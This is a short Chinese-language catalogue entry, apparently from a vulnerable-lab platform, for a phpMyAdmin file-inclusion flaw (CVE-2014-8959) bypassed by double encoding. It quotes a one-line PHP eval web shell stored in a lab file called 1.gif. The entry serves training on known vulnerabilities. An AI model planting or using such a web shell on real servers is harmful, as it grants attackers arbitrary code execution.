| ID: | 16560 |
|---|---|
| 标题: | phpmyadmin 文件包含(CVE-2014-8959) |
| 描述: | phpmyadmin 文件包含(CVE-2014-8959) vulfocus/phpmyadmin-cve_2014_8959:latest 描述: phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞。 访问http://ip:port/pma即可进入phpmyadmin。http://ip:port/下有测试账号密码,包含根目录下1.gif,其内容为:<?php@eval($_POST[a]);?> |
| 类型: | WEB |
| 网站: | vulfocus |
| 题目链接: | https://vulfocus.cn |
| 赛事: | None |
| 年度: | None |
| Flag值: | None |
| writeup: | 登录 https://vulfocus.cn 搜索phpmyadmin 文件包含(CVE-2014-8959) |